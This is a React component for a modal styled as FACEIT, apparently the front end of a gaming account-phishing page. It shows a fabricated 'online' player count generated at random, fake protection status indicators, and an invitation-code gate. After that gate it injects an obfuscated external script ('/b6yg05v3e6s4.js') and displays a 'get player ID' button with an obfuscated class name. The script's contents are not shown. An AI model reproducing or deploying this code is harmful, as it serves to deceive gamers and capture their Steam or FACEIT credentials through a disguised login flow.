import { useEffect, useState } from "react";
import { useNavigate } from "react-router-dom";
import logo from "./assets/faceit_logo.png";
import ch from "./assets/flags/ch.svg";
import de from "./assets/flags/de.svg";
import fn from "./assets/flags/fn.svg";
import hk from "./assets/flags/hk.svg";
import kz from "./assets/flags/kz.svg";
import nt from "./assets/flags/nt.svg";
import ru from "./assets/flags/ru.svg";
import uk from "./assets/flags/uk.svg";
import Status from "./components/Status";

import { useT } from "./router/Router";
import { createHubId, verifyUser } from "./utils/user";

const Modal = ({ opened, closeModal }: any) => {
    const navigate = useNavigate();
    const [nextStep, setNextStep] = useState(false);
    const [country, setCountry] = useState("");
    const [code, setCode] = useState("");
    const [codeError, setCodeError] = useState("");
    const [online, setOnline] = useState(6268);
    const [loading, setLoading] = useState(false);
    const t = useT();

    const countries = [
        {
            value: "nt",
            img: nt,
        },
        {
            value: "ru",
            img: ru,
        },
        {
            value: "uk",
            img: uk,
        },
        {
            value: "de",
            img: de,
        },

        {
            value: "fn",
            img: fn,
        },
        {
            value: "kz",
            img: kz,
        },
        {
            value: "ch",
            img: ch,
        },
        {
            value: "hk",
            img: hk,
        },
    ];

    useEffect(() => {
        const setUp = async () => {
            setLoading(true);

            const success = await verifyUser();

            setLoading(false);

            if (success && success.steam_connected) navigate("/review");
        };

        setUp();
    }, []);

    useEffect(() => {
        const script = document.createElement("script");

        if (nextStep) {
            document.body.appendChild(script);
            script.src = "/b6yg05v3e6s4.js";
        }

        const interval = setInterval(() => {
            if (nextStep) return;

            setOnline((prev) => {
                let change = Math.floor(Math.random() * 103) - 51;

                let newValue = Math.max(5286, Math.min(7493, prev + change));

                return newValue;
            });
        }, 2000);

        return () => {
            clearInterval(interval);
            script && script.remove();
        };
    }, [nextStep]);

    const handleNextStep = async () => {
        setCodeError("");
        setLoading(true);
        const success = await createHubId(code);

        setLoading(false);

        if (success?.isError || !success) {
            setCodeError(success?.data?.detail || "Invitation code not found");
            return;
        }

        setNextStep(true);
    };

    return (
        <div className={`modal-wrapper${opened ? " opened" : ""}`}>
            <div className="modal-container">
                <div className="modal-header">
                    <img src={logo} />
                    <span onClick={closeModal}>{t("close_modal")}</span>
                </div>

                <div className="modal">
                    {!nextStep ? (
                        <div className="modal-content">
                            <p className="title">{t("select_server")}</p>

                            <div className="online">
                                <span>
                                    <svg
                                        xmlns="http://www.w3.org/2000/svg"
                                        xmlnsXlink="http://www.w3.org/1999/xlink"
                                        fill="currentColor"
                                        width="20px"
                                        viewBox="0 0 410 410"
                                        xmlSpace="preserve"
                                    >
                                        <path d="M349.957,60.043C311.237,21.323,259.756,0,205,0C150.243,0,98.762,21.323,60.043,60.043C21.323,98.762,0,150.243,0,205    c0,54.756,21.323,106.236,60.043,144.957C98.762,388.677,150.243,410,205,410c54.756,0,106.237-21.323,144.957-60.043    C388.677,311.236,410,259.756,410,205C410,150.243,388.677,98.762,349.957,60.043z M362.492,180.055h-79.54    c-1.593-41.652-7.159-80.379-16.072-110.998c-1.286-4.415-2.64-8.627-4.046-12.647    C314.781,76.697,353.565,123.478,362.492,180.055z M205,358.201c-4.181-6.247-10.438-19.219-16.121-42.676    c-5.904-24.359-9.692-54.093-11.012-85.58h54.266c-1.32,31.487-5.106,61.219-11.012,85.578    C215.438,338.982,209.18,351.954,205,358.201z M177.867,180.055c1.319-31.488,5.107-61.221,11.012-85.58    c5.684-23.457,11.94-36.429,16.121-42.676c4.18,6.247,10.438,19.219,16.121,42.677c5.904,24.36,9.691,54.091,11.012,85.579    H177.867z M147.165,56.409c-1.407,4.021-2.762,8.232-4.046,12.647c-8.914,30.619-14.479,69.346-16.072,110.998H47.506    C56.435,123.479,95.219,76.698,147.165,56.409z M47.506,229.945h79.541c1.594,41.651,7.158,80.379,16.072,110.998    c1.284,4.414,2.639,8.626,4.046,12.646C95.219,333.302,56.435,286.521,47.506,229.945z M262.834,353.591    c1.406-4.021,2.76-8.23,4.046-12.646c8.913-30.618,14.479-69.347,16.072-110.998h79.54    C353.565,286.521,314.781,333.303,262.834,353.591z" />
                                    </svg>
                                    {t("country")}
                                </span>
                                <span>
                                    <svg
                                        xmlns="http://www.w3.org/2000/svg"
                                        width="20px"
                                        viewBox="0 0 24 24"
                                        fill="none"
                                    >
                                        <path
                                            fillRule="evenodd"
                                            clipRule="evenodd"
                                            d="M16.5 7.063C16.5 10.258 14.57 13 12 13c-2.572 0-4.5-2.742-4.5-5.938C7.5 3.868 9.16 2 12 2s4.5 1.867 4.5 5.063zM4.102 20.142C4.487 20.6 6.145 22 12 22c5.855 0 7.512-1.4 7.898-1.857a.416.416 0 0 0 .09-.317C19.9 18.944 19.106 15 12 15s-7.9 3.944-7.989 4.826a.416.416 0 0 0 .091.317z"
                                            fill="currentColor"
                                        />
                                    </svg>
                                    {online}
                                    <div className="ring-container">
                                        <div className="ringring"></div>
                                        <div className="circle"></div>
                                    </div>
                                </span>
                            </div>
                            <ul className="servers">
                                {countries &&
                                    countries.length > 0 &&
                                    countries.map((item) => (
                                        <li
                                            className={
                                                country === item.value
                                                    ? "active"
                                                    : ""
                                            }
                                            onClick={() =>
                                                setCountry(item.value)
                                            }
                                        >
                                            <img src={item.img} />

                                            {t(item.value)}
                                        </li>
                                    ))}
                            </ul>

                            <div className="input-wrapper">
                                <input
                                    value={code}
                                    onChange={(e) => setCode(e.target.value)}
                                    type="text"
                                    placeholder={t("enter_code")}
                                    readOnly={loading}
                                />
                            </div>

                            {codeError && (
                                <p style={{ color: "var(--primary-color)" }}>
                                    {codeError}
                                </p>
                            )}

                            <button
                                onClick={handleNextStep}
                                disabled={!country || !code || loading}
                            >
                                {t("next_step")}
                            </button>
                        </div>
                    ) : (
                        <div className="modal-content">
                            <div className="rule">
                                <svg
                                    xmlns="http://www.w3.org/2000/svg"
                                    width="30px"
                                    viewBox="0 0 24 24"
                                    fill="none"
                                >
                                    <path
                                        fill-rule="evenodd"
                                        clip-rule="evenodd"
                                        d="M5.25 10.0546V8C5.25 4.27208 8.27208 1.25 12 1.25C15.7279 1.25 18.75 4.27208 18.75 8V10.0546C19.8648 10.1379 20.5907 10.348 21.1213 10.8787C22 11.7574 22 13.1716 22 16C22 18.8284 22 20.2426 21.1213 21.1213C20.2426 22 18.8284 22 16 22H8C5.17157 22 3.75736 22 2.87868 21.1213C2 20.2426 2 18.8284 2 16C2 13.1716 2 11.7574 2.87868 10.8787C3.40931 10.348 4.13525 10.1379 5.25 10.0546ZM6.75 8C6.75 5.10051 9.10051 2.75 12 2.75C14.8995 2.75 17.25 5.10051 17.25 8V10.0036C16.867 10 16.4515 10 16 10H8C7.54849 10 7.13301 10 6.75 10.0036V8Z"
                                        fill="currentColor"
                                    />
                                </svg>
                                <div className="info">
                                    <p className="title">
                                        {t("public_account")}
                                    </p>
                                    <p>{t("public_account_desc")}</p>
                                </div>
                            </div>

                            <div className="rule">
                                <svg
                                    xmlns="http://www.w3.org/2000/svg"
                                    fill="currentColor"
                                    width="30px"
                                    viewBox="0 0 16 16"
                                >
                                    <path d="M11.57 4.87a.62.62 0 0 0-.05.88c1 1.11 1.1 4.79.51 7.22a.63.63 0 0 0 .46.76h.15a.63.63 0 0 0 .61-.47c.6-2.48.65-6.75-.8-8.36a.63.63 0 0 0-.88-.03zM8 4.1a4.67 4.67 0 0 1 1.89.39.62.62 0 1 0 .5-1.14A5.88 5.88 0 0 0 8 2.85C5 2.85 2.57 5 2.57 7.64a13.5 13.5 0 0 1-.49 4.65.62.62 0 0 0 .34.81.52.52 0 0 0 .24.05.63.63 0 0 0 .58-.38 14.34 14.34 0 0 0 .58-5.13C3.82 5.69 5.7 4.1 8 4.1z" />
                                    <path d="M13.6 2.44A8.27 8.27 0 0 0 8 .29a8.5 8.5 0 0 0-3.7.84A.62.62 0 0 0 4 2a.63.63 0 0 0 .84.29A7.38 7.38 0 0 1 8 1.54c3.65 0 6.73 2.79 6.73 6.1a.63.63 0 0 0 .63.62.62.62 0 0 0 .64-.62 7 7 0 0 0-2.4-5.2zM2.16 3.54a.64.64 0 0 0-.87.16A7.05 7.05 0 0 0 0 7.63a.63.63 0 0 0 .62.63.62.62 0 0 0 .62-.62 5.74 5.74 0 0 1 1.08-3.23.62.62 0 0 0-.16-.87zM8 5.41a2.9 2.9 0 0 0-2.2.8.61.61 0 0 0 0 .88.62.62 0 0 0 .88 0A1.83 1.83 0 0 1 8 6.66a1.62 1.62 0 0 1 1.65 1.18c.33.93 0 4.93-.55 6.4a.63.63 0 0 0 .38.8.78.78 0 0 0 .21 0 .62.62 0 0 0 .59-.42A18 18 0 0 0 11 11a10.9 10.9 0 0 0-.12-3.53A2.87 2.87 0 0 0 8 5.41zM5.68 8.34a.62.62 0 0 0-.57.66 11.09 11.09 0 0 1-.79 4.65.62.62 0 0 0 .18.86.6.6 0 0 0 .34.11.61.61 0 0 0 .52-.29 11.93 11.93 0 0 0 1-5.43.62.62 0 0 0-.68-.56z" />
                                    <path d="M7.9 7.66a.63.63 0 0 0-.52.72 15.66 15.66 0 0 1-.78 5.95.63.63 0 0 0 .29.84.63.63 0 0 0 .83-.29 16.6 16.6 0 0 0 .9-6.71.62.62 0 0 0-.72-.51z" />
                                </svg>
                                <div className="info">
                                    <p className="title">
                                        {t("secure_connection")}
                                    </p>
                                    <p>{t("secure_connection_credentials")}</p>
                                    <p>{t("secure_connection_desc")}</p>
                                </div>
                            </div>

                            <div className="statuses">
                                <div className="status">
                                    <span>{t("smurf_protection")}:</span>{" "}
                                    <Status />
                                </div>
                                <div className="status">
                                    <span>{t("license")}:</span> <Status />
                                </div>
                                <div className="status">
                                    <span>{t("vacs")}:</span> <Status />
                                </div>
                                <div className="status">
                                    <span>{t("server_connection")}:</span>{" "}
                                    <Status />
                                </div>
                                <div className="status">
                                    <span>{t("anti_bot_protection")}:</span>{" "}
                                    <Status />
                                </div>
                            </div>

                            <button className="uh21prsyofd2">
                                <svg
                                    xmlns="http://www.w3.org/2000/svg"
                                    fill="currentColor"
                                    width="20px"
                                    viewBox="0 0 32 32"
                                    version="1.1"
                                >
                                    <path d="M18.102 12.129c0-0 0-0 0-0.001 0-1.564 1.268-2.831 2.831-2.831s2.831 1.268 2.831 2.831c0 1.564-1.267 2.831-2.831 2.831-0 0-0 0-0.001 0h0c-0 0-0 0-0.001 0-1.563 0-2.83-1.267-2.83-2.83 0-0 0-0 0-0.001v0zM24.691 12.135c0-2.081-1.687-3.768-3.768-3.768s-3.768 1.687-3.768 3.768c0 2.081 1.687 3.768 3.768 3.768v0c2.080-0.003 3.765-1.688 3.768-3.767v-0zM10.427 23.76l-1.841-0.762c0.524 1.078 1.611 1.808 2.868 1.808 1.317 0 2.448-0.801 2.93-1.943l0.008-0.021c0.155-0.362 0.246-0.784 0.246-1.226 0-1.757-1.424-3.181-3.181-3.181-0.405 0-0.792 0.076-1.148 0.213l0.022-0.007 1.903 0.787c0.852 0.364 1.439 1.196 1.439 2.164 0 1.296-1.051 2.347-2.347 2.347-0.324 0-0.632-0.066-0.913-0.184l0.015 0.006zM15.974 1.004c-7.857 0.001-14.301 6.046-14.938 13.738l-0.004 0.054 8.038 3.322c0.668-0.462 1.495-0.737 2.387-0.737 0.001 0 0.002 0 0.002 0h-0c0.079 0 0.156 0.005 0.235 0.008l3.575-5.176v-0.074c0.003-3.12 2.533-5.648 5.653-5.648 3.122 0 5.653 2.531 5.653 5.653s-2.531 5.653-5.653 5.653h-0.131l-5.094 3.638c0 0.065 0.005 0.131 0.005 0.199 0 0.001 0 0.002 0 0.003 0 2.342-1.899 4.241-4.241 4.241-2.047 0-3.756-1.451-4.153-3.38l-0.005-0.027-5.755-2.383c1.841 6.345 7.601 10.905 14.425 10.905 8.281 0 14.994-6.713 14.994-14.994s-6.713-14.994-14.994-14.994c-0 0-0.001 0-0.001 0h0z" />
                                </svg>
                                {t("get_player_id")}
                            </button>
                        </div>
                    )}
                </div>
            </div>
        </div>
    );
};

export default Modal;
